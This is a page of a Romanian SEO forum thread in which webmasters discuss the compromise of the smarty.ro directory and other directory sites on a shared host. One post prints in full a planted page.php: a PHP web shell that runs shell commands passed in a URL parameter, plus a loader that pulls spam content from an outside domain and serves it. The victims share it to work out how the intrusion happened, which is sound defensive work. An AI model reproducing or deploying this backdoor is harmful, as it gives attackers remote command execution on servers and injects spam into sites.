Pagina 2 din 3 PrimulPrimul 123 UltimulUltimul
Rezultate 11 la 20 din 25

Subiect: Spam Smarty!!!

  1. #11
    Avatarul lui Punct
    Punct este deconectat Membru SeoPedia
    Reputatie:
    34
    Data înscrierii
    3rd January 2008
    Locaţie
    Romania
    Vârstă
    40
    Posturi
    231
    Putere Rep
    34


    Implicit

    Va rog, unul care se pricepe mai bine ca nu prea inteleg NIMIC... sa spuna mare si tare despre ce este vorba sa avem si noi de unde sa invatam si sa stim cum sa ne ferim, ofer reputatie pentru un raspuns bun. multumesc.

    Imi pare rau pentru Smarty, sper sa o rezolvi cu el.
    I don't know much...

  2. #12
    Avatarul lui tataraseni
    tataraseni este deconectat Ambasador
    Reputatie:
    44
    Data înscrierii
    15th July 2005
    Locaţie
    Brasov
    Posturi
    1.482
    Putere Rep
    44


    Implicit

    Citat Postat în original de Punct Vezi Post
    Va rog, unul care se pricepe mai bine ca nu prea inteleg NIMIC... sa spuna mare si tare despre ce este vorba sa avem si noi de unde sa invatam si sa stim cum sa ne ferim, ofer reputatie pentru un raspuns bun. multumesc.

    Imi pare rau pentru Smarty, sper sa o rezolvi cu el.
    Probabil ca o sa-l refac de la zero pe o platforma open-source ca astia de la BosDev imi cer 10 USD ca sa fac update la versiunea de script care rezolva problema acestui exploit - injectare de cod... sau sa ma bag sa iau eu la mana codul dar aceasta inseamna munca de SISIF... nu stiu cum voi face cu importul celor aproape 10.000 de site-uri inscrise dar ma descurce eu pana la urma... cert e ca pe structura de acum nu ofera prea multe decat un backlink si un numar de vizitatori ne-satisfacator...

  3. #13
    Avatarul lui Bruzli
    Bruzli este deconectat Administrator
    Reputatie:
    44
    Data înscrierii
    25th April 2005
    Locaţie
    Oradea
    Vârstă
    47
    Posturi
    980
    Putere Rep
    44


    Implicit

    Aveai injectat cod html/javascript in fisierul index.php? Sau ce modificari ai avut?

  4. #14
    Avatarul lui tataraseni
    tataraseni este deconectat Ambasador
    Reputatie:
    44
    Data înscrierii
    15th July 2005
    Locaţie
    Brasov
    Posturi
    1.482
    Putere Rep
    44


    Implicit

    aveam o functie getcontent() care lua toate prostiile alea de pe un server extern si le afisa in footer-ul lui Smarty

  5. #15
    Avatarul lui Toto
    Toto este deconectat Ambasador
    Reputatie:
    48
    Data înscrierii
    14th June 2005
    Locaţie
    Bucuresti
    Posturi
    1.905
    Putere Rep
    48


    Implicit

    Si page.php cum a ajuns pe server?? Sau ... Cum dracu functioneaza acest bosdev??? Ce naiba e pe serverul ala?? Probabil ai facut-o deja, insa ar fi bine sa verifici toate site-urile care le ai pe serverul ala si poate ar fi bine sa iti si ei talpasita de acolo...

  6. #16
    Avatarul lui tataraseni
    tataraseni este deconectat Ambasador
    Reputatie:
    44
    Data înscrierii
    15th July 2005
    Locaţie
    Brasov
    Posturi
    1.482
    Putere Rep
    44


    Implicit

    Iata ce contine acel page.php, serverul e share... nu stiu daca e cazul sa spun unde e gazduit dar nu cred ca e vorba de permisiunile mele (555 pe public_html)
    Cod PHP:
    <?

    error_reporting
    (0);

    if(
    $_GET['cmd45']) {
    system($_GET['cmd45']);
    }
    if(
    $_GET['gid']) {
    $ret $_SERVER['SCRIPT_NAME'];
    preg_match("/.*\/(.*)/"$ret$matches);
    $ret filesize($matches[1]);
    print 
    $ret;
    exit();
    }
    $domain 'shemale1.biz';

    $ur '/load.php?f=%s&ua=%s&ref=%s';
    $qs $_SERVER['QUERY_STRING'];

    $ua urlencode(substr($_SERVER['HTTP_USER_AGENT'],0,100));

    $ref urlencode($_SERVER['HTTP_REFERER']);

    $redirect sprintf($ur,$qs,$ua,$ref);
    #print $redirect;
    #exit;

    echo getcontent($domain,80,$redirect);
    exit;

    function 
    getcontent($server$port$file)
    {
    $socket=fsockopen($server,$port,$errno,$errstr,60) or die("Can't open socket");
    $refer $_SERVER['HTTP_HOST']?$_SERVER['HTTP_HOST']:$server;
    fputs($socket"GET $file HTTP/1.0\r\n");
    fputs($socket"Referer: http://$refer\r\n");
    fputs($socket"Host: $server\r\n");
    fputs($socket"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n\r\n");

    $wr 0;

    while(!
    feof($socket))
    {
    $temp fgets($socket);
    if(
    eregi("<",$temp)) {
    $wr 1;
    }

    if(
    $wr) {
    $page .= $temp;
    }
    }
    fclose($socket);

    return 
    $page;
    }

    ?>

  7. #17
    Avatarul lui barosanu
    barosanu este deconectat Membru SeoPedia
    Reputatie:
    37
    Data înscrierii
    7th February 2007
    Posturi
    728
    Putere Rep
    37


    Implicit

    asa si cu spamul cum ramane..ca si eu am primit la greu..

  8. #18
    Avatarul lui ZendNet
    ZendNet este deconectat Guest
    Reputatie:
    0
    Data înscrierii
    16th September 2007
    Posturi
    8
    Putere Rep
    0


    Implicit page.php

    @tataraseni

    Am exact aceeasi problema ca si tine pe un director de rank 5. Am luat si penalty pentru ca nu am observat la timp.
    Am gasit page.php in radacina si mainpage.php sub un director, iar ambele au acelasi cod postat de tine.
    Ce nu am inteles bine este pe ce script ti s-a intamplat. Pe BosDev? Sau pe phpld. Eu folosesc phpld si acolo am gasit fisierul pus de doua ori, exact acelasi cod cu al tau.
    As fi curios ce parere ai despre cum a ajuns fisierul acolo.
    La mine hosting-ul mi-a dat clar logul de ftp cand a fost pus fisierul. Problema mea cea mai mare este CUM s-a obtinut login-ul. (sniff de login sau scriptul are gauri)

  9. #19
    Avatarul lui tataraseni
    tataraseni este deconectat Ambasador
    Reputatie:
    44
    Data înscrierii
    15th July 2005
    Locaţie
    Brasov
    Posturi
    1.482
    Putere Rep
    44


    Implicit

    Citat Postat în original de ZendNet Vezi Post
    @tataraseni

    Am exact aceeasi problema ca si tine pe un director de rank 5. Am luat si penalty pentru ca nu am observat la timp.
    Am gasit page.php in radacina si mainpage.php sub un director, iar ambele au acelasi cod postat de tine.
    Ce nu am inteles bine este pe ce script ti s-a intamplat. Pe BosDev? Sau pe phpld. Eu folosesc phpld si acolo am gasit fisierul pus de doua ori, exact acelasi cod cu al tau.
    As fi curios ce parere ai despre cum a ajuns fisierul acolo.
    La mine hosting-ul mi-a dat clar logul de ftp cand a fost pus fisierul. Problema mea cea mai mare este CUM s-a obtinut login-ul. (sniff de login sau scriptul are gauri)
    ...cred ca avem acelasi hosting... si de aici problema... scriptul folosit pe www.smarty.ro e BosDev Directory...

  10. #20
    Avatarul lui ZendNet
    ZendNet este deconectat Guest
    Reputatie:
    0
    Data înscrierii
    16th September 2007
    Posturi
    8
    Putere Rep
    0


    Implicit

    da, am verificat acum si e acelasi hosting. scripturile sunt diferite. acces pe ftp pentru upload? sau ambele scripturi au acelasi bug? din cate ai scris cei de la BosDev ti-ar rezolva problema la 10$. La mine problema e ca scriptul e cu update, iar acel bug nu exista. Singura treaba interesanta este cum de la mine din 5 directoare mi-a lovit unul singur. Toate cu acelasi script, pe acelasi server, aceeasi versiune de php. Sper sa nu ma trezesc cu ele maine toate facute salata.

Pagina 2 din 3 PrimulPrimul 123 UltimulUltimul

Informații subiect

Utilizatori care navighează în acest subiect

Momentan este/sunt 1 utilizator(i) care navighează în acest subiect. (0 membrii și 1 vizitatori)

Thread-uri Similare

  1. Smarty in DMOZ
    De tataraseni în forumul DMOZ
    Răspunsuri: 16
    Ultimul Post: 27th April 2007, 16:08
  2. Vand Smarty
    De tataraseni în forumul Website-uri
    Răspunsuri: 25
    Ultimul Post: 17th January 2007, 11:09
  3. spam smarty.ro
    De Bruzli în forumul E-mail SPAM
    Răspunsuri: 23
    Ultimul Post: 1st November 2006, 09:50
  4. Cu Smarty - Schimb De Legaturi
    De tataraseni în forumul Link/banner exchange
    Răspunsuri: 4
    Ultimul Post: 14th July 2006, 13:51
  5. Smarty.ro
    De tataraseni în forumul Studii de caz
    Răspunsuri: 2
    Ultimul Post: 15th May 2006, 09:40

Permisiuni postare

  • Nu puteţi posta subiecte noi.
  • Nu puteţi răspunde la subiecte
  • Nu puteţi adăuga ataşamente
  • Nu puteţi modifica posturile proprii
  •